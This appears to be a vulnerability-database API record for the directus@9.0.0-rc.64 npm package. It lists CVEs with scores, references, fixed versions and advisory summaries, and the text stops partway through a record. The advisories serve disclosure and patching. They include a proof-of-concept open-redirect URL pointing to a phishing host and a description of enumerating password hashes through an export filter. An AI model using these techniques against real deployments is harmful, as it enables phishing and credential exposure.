Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:npm/directus@9.0.0-rc.64
Typenpm
Namespace
Namedirectus
Version9.0.0-rc.64
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version11.3.3
Latest_non_vulnerable_version11.17.0
Affected_by_vulnerabilities
0
url VCID-1hn2-pjm6-dyhj
vulnerability_id VCID-1hn2-pjm6-dyhj
summary 
Duplicate
This advisory duplicates another.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-26969
reference_id
reference_type
scores
0
value 0.00909
scoring_system epss
scoring_elements 0.76152
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-26969
1
reference_url https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/
url https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
2
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
3
reference_url https://github.com/directus/directus/blob/8daed9c41baeaf1d08c1e292bf9f0dcef65e48fb/docs/configuration/config-options.md
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/
url https://github.com/directus/directus/blob/8daed9c41baeaf1d08c1e292bf9f0dcef65e48fb/docs/configuration/config-options.md
4
reference_url https://github.com/directus/directus/pull/12022
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/
url https://github.com/directus/directus/pull/12022
5
reference_url https://github.com/directus/directus/releases/tag/v9.7.0
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/
url https://github.com/directus/directus/releases/tag/v9.7.0
6
reference_url https://security.snyk.io/vuln/SNYK-JS-DIRECTUS-2441822
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/
url https://security.snyk.io/vuln/SNYK-JS-DIRECTUS-2441822
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-26969
reference_id CVE-2022-26969
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-26969
8
reference_url https://github.com/advisories/GHSA-g27j-74fp-xfpr
reference_id GHSA-g27j-74fp-xfpr
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-g27j-74fp-xfpr
9
reference_url https://github.com/directus/directus/security/advisories/GHSA-g27j-74fp-xfpr
reference_id GHSA-g27j-74fp-xfpr
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/security/advisories/GHSA-g27j-74fp-xfpr
fixed_packages
0
url pkg:npm/directus@9.7.0
purl pkg:npm/directus@9.7.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-9gba-zszk-p3h6
3
vulnerability VCID-eb8p-vqjt-yfb8
4
vulnerability VCID-ejme-tqn4-byhk
5
vulnerability VCID-et4m-8y15-9fb9
6
vulnerability VCID-eygf-cb4y-hqd3
7
vulnerability VCID-gjju-tu4e-gqfc
8
vulnerability VCID-hrqc-8err-4fbx
9
vulnerability VCID-kqs7-8txh-jyc8
10
vulnerability VCID-m3wb-sstx-v3d6
11
vulnerability VCID-msb5-197k-a3er
12
vulnerability VCID-szny-2sbf-v7de
13
vulnerability VCID-v4vz-smcx-gygb
14
vulnerability VCID-wgag-36wa-qyay
15
vulnerability VCID-xt9c-32g5-mqes
16
vulnerability VCID-yutw-33sk-5fg3
17
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0
aliases CVE-2022-26969, GHSA-g27j-74fp-xfpr, GMS-2022-677
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1hn2-pjm6-dyhj
1
url VCID-3cgw-zr3k-3fen
vulnerability_id VCID-3cgw-zr3k-3fen
summary 
Session Token in URL in directus
### Impact

When reaching the /files page, a JWT is passed via GET request. Inclusion of session tokens in URLs poses a security risk as URLs are often logged in various places (e.g., web server logs, browser history). Attackers gaining access to these logs may hijack active user sessions, leading to unauthorized access to sensitive information or actions on behalf of the user.

### Patches

_Has the problem been patched? What versions should users upgrade to?_

### Workarounds

There's no workaround available.

### References

_Are there any links users can visit to find out more?_
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-28238
reference_id
reference_type
scores
0
value 0.0009
scoring_system epss
scoring_elements 0.2556
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-28238
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 2.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-28238
reference_id CVE-2024-28238
reference_type
scores
0
value 2.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-28238
3
reference_url https://github.com/advisories/GHSA-2ccr-g2rv-h677
reference_id GHSA-2ccr-g2rv-h677
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-2ccr-g2rv-h677
4
reference_url https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677
reference_id GHSA-2ccr-g2rv-h677
reference_type
scores
0
value 2.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-02T19:50:33Z/
url https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677
fixed_packages
0
url pkg:npm/directus@10.10.0
purl pkg:npm/directus@10.10.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7fzh-j76t-5kd3
1
vulnerability VCID-8uym-xka8-cybb
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-kqs7-8txh-jyc8
4
vulnerability VCID-m3wb-sstx-v3d6
5
vulnerability VCID-m5ng-dsfx-6qev
6
vulnerability VCID-msb5-197k-a3er
7
vulnerability VCID-wgag-36wa-qyay
8
vulnerability VCID-xc7t-gwaz-ckeu
9
vulnerability VCID-xt9c-32g5-mqes
10
vulnerability VCID-yutw-33sk-5fg3
11
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.10.0
aliases CVE-2024-28238, GHSA-2ccr-g2rv-h677
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3cgw-zr3k-3fen
2
url VCID-8r4e-a1vf-9bd9
vulnerability_id VCID-8r4e-a1vf-9bd9
summary 
URL Redirection to Untrusted Site in OAuth2/OpenID in directus
### Summary
The authentication API has a `redirect` parameter that can be exploited as an open redirect vulnerability as the user tries to log in via the API URL https://docs.directus.io/reference/authentication.html#login-using-sso-providers /auth/login/google?redirect for example.

### Details
There's a redirect that is done after successful login via the Auth API GET request to `directus/auth/login/google?redirect=http://malicious-fishing-site.com`, which I think is here: https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L394. While credentials don't seem to be passed to the attacker site, the user can be phished into clicking a legitimate directus site and be taken to a malicious site made to look like a an error message "Your password needs to be updated" to phish out the current password.

### PoC
Turn on any auth provider in Directus instance. Form a link to `directus-instance/auth/login/:provider_id?redirect=http://malicious-fishing-site.com`, login and get taken to malicious-site. Tested on the `ory` OAuth2 integration.

### Impact
Users who login via OAuth2 into Directus.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-28239
reference_id
reference_type
scores
0
value 0.0023
scoring_system epss
scoring_elements 0.45793
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-28239
1
reference_url https://docs.directus.io/reference/authentication.html#login-using-sso-providers
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/
url https://docs.directus.io/reference/authentication.html#login-using-sso-providers
2
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
3
reference_url https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/
url https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-28239
reference_id CVE-2024-28239
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-28239
5
reference_url https://github.com/advisories/GHSA-fr3w-2p22-6w7p
reference_id GHSA-fr3w-2p22-6w7p
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fr3w-2p22-6w7p
6
reference_url https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p
reference_id GHSA-fr3w-2p22-6w7p
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/
url https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p
fixed_packages
0
url pkg:npm/directus@10.10.0
purl pkg:npm/directus@10.10.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7fzh-j76t-5kd3
1
vulnerability VCID-8uym-xka8-cybb
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-kqs7-8txh-jyc8
4
vulnerability VCID-m3wb-sstx-v3d6
5
vulnerability VCID-m5ng-dsfx-6qev
6
vulnerability VCID-msb5-197k-a3er
7
vulnerability VCID-wgag-36wa-qyay
8
vulnerability VCID-xc7t-gwaz-ckeu
9
vulnerability VCID-xt9c-32g5-mqes
10
vulnerability VCID-yutw-33sk-5fg3
11
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.10.0
aliases CVE-2024-28239, GHSA-fr3w-2p22-6w7p
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8r4e-a1vf-9bd9
3
url VCID-9gba-zszk-p3h6
vulnerability_id VCID-9gba-zszk-p3h6
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-36031
reference_id
reference_type
scores
0
value 0.0026
scoring_system epss
scoring_elements 0.495
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-36031
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-36031
reference_id CVE-2022-36031
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-36031
3
reference_url https://github.com/advisories/GHSA-77qm-wvqq-fg79
reference_id GHSA-77qm-wvqq-fg79
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-77qm-wvqq-fg79
4
reference_url https://github.com/directus/directus/security/advisories/GHSA-77qm-wvqq-fg79
reference_id GHSA-77qm-wvqq-fg79
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:45:00Z/
url https://github.com/directus/directus/security/advisories/GHSA-77qm-wvqq-fg79
fixed_packages
0
url pkg:npm/directus@9.15.0
purl pkg:npm/directus@9.15.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-ejme-tqn4-byhk
4
vulnerability VCID-et4m-8y15-9fb9
5
vulnerability VCID-eygf-cb4y-hqd3
6
vulnerability VCID-gjju-tu4e-gqfc
7
vulnerability VCID-hrqc-8err-4fbx
8
vulnerability VCID-kqs7-8txh-jyc8
9
vulnerability VCID-m3wb-sstx-v3d6
10
vulnerability VCID-msb5-197k-a3er
11
vulnerability VCID-szny-2sbf-v7de
12
vulnerability VCID-v4vz-smcx-gygb
13
vulnerability VCID-wgag-36wa-qyay
14
vulnerability VCID-xc7t-gwaz-ckeu
15
vulnerability VCID-xt9c-32g5-mqes
16
vulnerability VCID-yutw-33sk-5fg3
17
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.15.0
aliases CVE-2022-36031, GHSA-77qm-wvqq-fg79
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9gba-zszk-p3h6
4
url VCID-eb8p-vqjt-yfb8
vulnerability_id VCID-eb8p-vqjt-yfb8
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-34708
reference_id
reference_type
scores
0
value 0.00324
scoring_system epss
scoring_elements 0.55666
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-34708
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/commit/e70a90c267bea695afce6545174c2b77517d617b
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-15T15:21:26Z/
url https://github.com/directus/directus/commit/e70a90c267bea695afce6545174c2b77517d617b
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-34708
reference_id CVE-2024-34708
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-34708
4
reference_url https://github.com/advisories/GHSA-p8v3-m643-4xqx
reference_id GHSA-p8v3-m643-4xqx
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-p8v3-m643-4xqx
5
reference_url https://github.com/directus/directus/security/advisories/GHSA-p8v3-m643-4xqx
reference_id GHSA-p8v3-m643-4xqx
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-15T15:21:26Z/
url https://github.com/directus/directus/security/advisories/GHSA-p8v3-m643-4xqx
fixed_packages
0
url pkg:npm/directus@10.11.0
purl pkg:npm/directus@10.11.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-kqs7-8txh-jyc8
1
vulnerability VCID-m3wb-sstx-v3d6
2
vulnerability VCID-m5ng-dsfx-6qev
3
vulnerability VCID-msb5-197k-a3er
4
vulnerability VCID-wgag-36wa-qyay
5
vulnerability VCID-xc7t-gwaz-ckeu
6
vulnerability VCID-xt9c-32g5-mqes
7
vulnerability VCID-yutw-33sk-5fg3
8
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.11.0
aliases CVE-2024-34708, GHSA-p8v3-m643-4xqx
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-eb8p-vqjt-yfb8
5
url VCID-ejme-tqn4-byhk
vulnerability_id VCID-ejme-tqn4-byhk
summary 
Directus version number disclosure
### Impact

Currently the exact Directus version number is being shipped in compiled JS bundles which are accessible without authentication. With this information a malicious attacker can trivially look for known vulnerabilities in Directus core or any of its shipped dependencies in that specific running version.

### Patches

The problem has been resolved in versions 10.8.3 and newer

### Workarounds

None
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-27296
reference_id
reference_type
scores
0
value 0.00437
scoring_system epss
scoring_elements 0.63372
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-27296
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-01T19:28:33Z/
url https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-27296
reference_id CVE-2024-27296
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-27296
4
reference_url https://github.com/advisories/GHSA-5mhg-wv8w-p59j
reference_id GHSA-5mhg-wv8w-p59j
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5mhg-wv8w-p59j
5
reference_url https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j
reference_id GHSA-5mhg-wv8w-p59j
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-01T19:28:33Z/
url https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j
fixed_packages
0
url pkg:npm/directus@10.8.3
purl pkg:npm/directus@10.8.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-kqs7-8txh-jyc8
4
vulnerability VCID-m3wb-sstx-v3d6
5
vulnerability VCID-msb5-197k-a3er
6
vulnerability VCID-wgag-36wa-qyay
7
vulnerability VCID-xc7t-gwaz-ckeu
8
vulnerability VCID-xt9c-32g5-mqes
9
vulnerability VCID-yutw-33sk-5fg3
10
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.8.3
aliases CVE-2024-27296, GHSA-5mhg-wv8w-p59j
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ejme-tqn4-byhk
6
url VCID-et4m-8y15-9fb9
vulnerability_id VCID-et4m-8y15-9fb9
summary 
Exposure of Sensitive Information to an Unauthorized Actor
Directus is a real-time API and App dashboard for managing SQL database content. In versions prior to 9.16.0 users with read access to the `password` field in `directus_users` can extract the argon2 password hashes by brute forcing the export functionality combined with a `_starts_with` filter. This allows the user to enumerate the password hashes. Accounts cannot be taken over unless the hashes can be reversed which is unlikely with current hardware. This problem has been patched by preventing any hashed/concealed field to be filtered against with the `_starts_with` or other string operator in version 9.16.0. Users are advised to upgrade. Users unable to upgrade may mitigate this issue by ensuring that no user has `read` access to the `password` field in `directus_users`.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-27481
reference_id
reference_type
scores
0
value 0.00301
scoring_system epss
scoring_elements 0.53689
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-27481
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/pull/14829
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/
url https://github.com/directus/directus/pull/14829
3
reference_url https://github.com/directus/directus/pull/15010
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/
url https://github.com/directus/directus/pull/15010
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-27481
reference_id CVE-2023-27481
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-27481
5
reference_url https://github.com/advisories/GHSA-m5q3-8wgf-x8xf
reference_id GHSA-m5q3-8wgf-x8xf
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-m5q3-8wgf-x8xf
6
reference_url https://github.com/directus/directus/security/advisories/GHSA-m5q3-8wgf-x8xf
reference_id GHSA-m5q3-8wgf-x8xf
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/
url https://github.com/directus/directus/security/advisories/GHSA-m5q3-8wgf-x8xf
fixed_packages
0
url pkg:npm/directus@9.16.0
purl pkg:npm/directus@9.16.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-ejme-tqn4-byhk
4
vulnerability VCID-eygf-cb4y-hqd3
5
vulnerability VCID-gjju-tu4e-gqfc
6
vulnerability VCID-hrqc-8err-4fbx
7
vulnerability VCID-kqs7-8txh-jyc8
8
vulnerability VCID-m3wb-sstx-v3d6
9
vulnerability VCID-msb5-197k-a3er
10
vulnerability VCID-szny-2sbf-v7de
11
vulnerability VCID-v4vz-smcx-gygb
12
vulnerability VCID-wgag-36wa-qyay
13
vulnerability VCID-xc7t-gwaz-ckeu
14
vulnerability VCID-xt9c-32g5-mqes
15
vulnerability VCID-yutw-33sk-5fg3
16
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.16.0
aliases CVE-2023-27481, GHSA-m5q3-8wgf-x8xf
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-et4m-8y15-9fb9
7
url VCID-eygf-cb4y-hqd3
vulnerability_id VCID-eygf-cb4y-hqd3
summary 
Insertion of Sensitive Information into Log File
Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.23.3, the `directus_refresh_token` is not redacted properly from the log outputs and can be used to impersonate users without their permission. This issue is patched in version 9.23.3.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-28443
reference_id
reference_type
scores
0
value 0.00061
scoring_system epss
scoring_elements 0.19237
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-28443
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 4.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
